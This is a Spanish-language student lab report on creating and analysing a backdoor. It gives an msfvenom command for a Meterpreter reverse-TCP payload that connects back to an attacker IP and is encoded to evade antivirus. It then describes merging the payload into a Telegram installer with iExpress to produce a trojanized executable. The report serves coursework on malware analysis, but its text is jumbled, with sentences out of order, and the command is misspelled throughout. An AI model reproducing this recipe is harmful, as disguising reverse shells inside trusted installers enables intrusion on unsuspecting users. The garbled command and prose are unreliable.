LABORATORIO DE ANALISIS DE MALWARE Lorena Zamudio Méndez Franklin Cesar Estévez Nelson Morales Raúl Zambrano ESPECIALIZACIÓN: SEGURIDAD EN REDES DE COMPUTADORES SENA INTRODUCCIÓN. En las ciencias de la informática existen gran cantidad de adelantos tecnológicos, así mismo, los expertos en estas ciencias han ideado gran cantidad artificios para realizar actividades buenas dentro de parámetros legales como algunos elementos con mucho talento pero que se dejan seducir por fuerzas oscuras. En el siguiente informe mostraremos que es y cómo funciona el denominado backdoor o puerta trasera, utilizado por los usurpadores de sistemas o hacker para tomar control de equipos de cómputo; desde un equipo normal de hogar hasta una estación de rebajo que está conectada a una red empresarial con seguridades. en analizar los diferentes tipos de datos que hay en una máquina, y la manipulación de estos, también incluye otras técnicas como la recuperación de datos perdidos que veremos en un futuro. Es aconsejable hacer uso de una máquina virtual para este tipo de análisis. Creación BackDoor Mostraremos el paso a paso de cómo se crea el backdoor y el respectivo análisis que se le realizo para determinar si nuestro instalador tiene un backdoor incluido en el. vemos la dirección ip de nuestra víctima. Crearemos un BackDoor con Novalite y seguimos paso a paso el tutorial. Una rama de la informática a la que llamamos informática forense, esta técnica consiste Nuestra ip del equipo del atacante. A continuación, usaremos la aplicación msfvenom con la cual crearemos nuestro backdoor. Msfvenom: Esta herramienta que pertenece al framework de Metasploit, msfvenom es la unión de msfpayload y msfencode. msfpayload se encarga de generar payloads para distintas plataformas, mientras que msfencode se encarga de codificar dichos payloads con el objetivo de evadir la detección mediante el uso de antivirus. El comando utilizado para crear el backdoor es el siguiente: Msfvenom –p windows/metelpreter/reverce _tcp LHOST=192.168.188.139 LPORT =2020 –e x86/shicata_na_gai –i 10 –f exe > /root/Violator.exe Ubicamos nuestro backdoor en el sistema de archivos Root del Ubuntu. Lo ubicamos por carpeta compartida en el equipo victima Windows 7. Como nos indica la guía de taller, utilizamos la herramienta iExpress 2.0 la cual nos permitirá crear un nuevo ejecutable donde vamos a unir nuestro ejecutable del telegram tsetup.1.1.23 con nuestro backdoor violator.exe, en donde nos da como resultado un nuevo ejecutable tsetup. Análisis del backdoor creado. Generamos el hash de nuestro telegram modificado con nuestro backdoor.